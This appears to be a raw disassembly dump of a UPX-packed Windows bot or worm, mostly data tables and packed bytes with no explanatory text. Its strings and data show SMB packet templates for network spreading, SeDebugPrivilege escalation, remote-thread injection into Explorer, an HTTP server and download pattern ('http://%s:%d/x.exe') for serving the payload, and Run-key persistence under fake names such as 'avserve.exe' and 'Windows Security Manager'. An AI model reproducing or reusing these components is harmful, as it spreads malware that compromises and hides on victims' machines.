dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31424BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31421801+41B�o
; sub_31421801+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31424C70: ; DATA XREF: sub_31421801+44A�o
jmp short loc_31424C78
; ---------------------------------------------------------------------------
jmp short loc_31424C7A
; ---------------------------------------------------------------------------
align 8
loc_31424C78: ; CODE XREF: UPX0:loc_31424C70�j
; DATA XREF: sub_31421801+5C�o
pop esp
pop esp
loc_31424C7A: ; CODE XREF: UPX0:31424C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8�o
; sub_314223B2+12C�o
align 10h
aUterm19 db 'uterm19',0 ; DATA XREF: sub_31421DF0:loc_31421ED5�o
; UPX0:31422351�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18�o
align 4
dword_31424D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_3142207E+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233C�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11E�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111�o
align 4
aU19x db 'u19x',0 ; DATA XREF: sub_314223B2+BD�o
align 4
aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6�o
aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AF�o
aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8�o
aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1�o
aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9A�o
aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93�o
aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8C�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85�o
aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7E�o
aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77�o
aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70�o
aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2A�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_314221C4+23�o
; sub_314229E6+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1C�o
; sub_31422A9B+87�o ...
align 10h
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_314215C7+4F�o
; sub_31422B67+57�o ...
align 10h
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32�o
aClient db 'Client',0 ; DATA XREF: sub_31422B67+BC�o
; sub_31422B67+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31422B67+37�o
; sub_31422B67+75�o
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+F�o
align 4
a1: ; DATA XREF: sub_31422B67+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_31424FE8 dd 0 ; sub_314221C4+80�w
dword_31424FEC dd 0 ; sub_314216A2+53�o ...
dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212C�r ...
dword_31424FF4 dd 70h ; UPX0:3142235C�w ...
dword_31424FF8 dd 0 ; sub_314223B2+CE�w
dword_31424FFC dd 0 ; sub_31422712+20�r
dword_31425000 dd 31420000h ; UPX0:31422341�w
dword_31425004 dd 0 ; sub_314216A2+4A�o ...
dword_31425008 dd 0 ; UPX0:314227C1�w
word_3142500C dw 0 ; DATA XREF: sub_3142255F+3B�r
; sub_314225C3:loc_31422624�r ...
align 10h
dword_31425010 dd 0 ; sub_31422B67+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31427BB1�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0C8000201h
dd 40D859h, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h
dd 10h, 40h, 314200h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 34000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h
dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h
dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h
dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h
dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h
dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h
dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h
dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h
dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h
dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h
dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h
dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
dd 0EE062AB4h, 1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h
dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah
dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h, 6C54A0E9h
dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h
dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h, 9E0AC1Eh
dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h, 74C73BECh
dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh
dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h, 0B269310Fh
dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh
dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh, 1450A850h
dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h
dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h, 148861C2h
dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh
dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh
dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch
dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch
dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h
dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh, 9B613421h
dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h
dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h, 8B0200B6h
dd 33125Dh, 0F3702647h, 19DC201h, 53C4EAC9h, 0A311E3C6h
dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h
dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h
dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh, 0FC0DFE00h
dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh
dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h
dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h
dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch, 54533AB5h
dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h
dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h, 80686806h
dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h
dd 27B6B6Ch, 80EB3A01h, 9AD468E6h, 1A4DFD77h, 0B34A3678h
dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h
dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h, 0F8DA6A12h
dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 0EC5D89E8h, 0DFFF050Dh
dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh
dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h
dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh, 15207E68h
dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh
dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h, 9B0D0AF9h
dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh
dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h
dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah
dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h, 90458C13h
dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h, 47239134h
dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h
dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h
dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h
dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h, 415C0376h
dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch
dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh
dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h
dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h
dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h
dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh
dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h
dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh
dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h
dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh
dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h
dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h
dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h
dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h
dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h
dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh
dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h
dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh
dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h, 0B02B39DFh
dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 68661C4Dh
dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h, 838506Ah
dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh
dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh
dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh
dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h
dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh, 968160C8h
dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h
dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh
dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh
dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h, 25270055h
dd 5ACE5903h, 40C520Ah, 9262CF20h, 28AF5D0Ch, 89E2B701h
dd 21DE53C3h, 948E694Eh
dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h, 281D146Ch
dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h, 0CF203BD0h
dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh, 4804C1FEh
dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h
dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch, 0D91B1C8h
dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h
dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h
dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h
dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h
dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h, 8BB38163h
dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h
dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h, 0E26EE66h
dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h
dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h
dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h
dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh
dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh
dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h
dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h
dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah, 0B6413BBBh
dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h
dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h
dd 0CC401113h, 0F42A66E7h, 2806FF00h, 0A910F805h, 0F49199EFh
dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh
dd 1B1FDBEh, 2BEC7317h, 0CC48BC8h, 88BE18Bh, 0B5B236EAh
dd 4353A302h, 45055C64h, 58363605h, 0A2000049h, 0F1022C02h
dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh, 0F501018Fh
dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh, 843994FFh
dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh
dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h, 6E695709h
dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh, 8EE434h
dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh
dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah
dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h
dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h
dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh
dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h
dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh, 0BEF6FD47h
dd 276266Dh, 76742E7Ah, 6F74111Bh, 856E2E70h, 178C2D80h
dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h
dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh
dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h
dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h, 0F6EDF862h
dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h, 4E4D4C4Bh
dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h, 74746823h
dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h
dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h
dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh
dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h
dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch
dd 46302C06h, 7889934h, 0EBEDE247h, 0E8342FF7h, 7EDAE80Ah
dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h
dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh
dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh, 0F931C96h
dd 3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h, 0F19DF3EDh
dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h
dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h
dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h, 0ED6F6D9Fh
dd 0C850B2h, 57DC1499h, 4E122555h, 0DFECC0A4h, 1291EDDEh
dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh
dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh
dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah
dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h
dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h, 5F37F776h
dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh
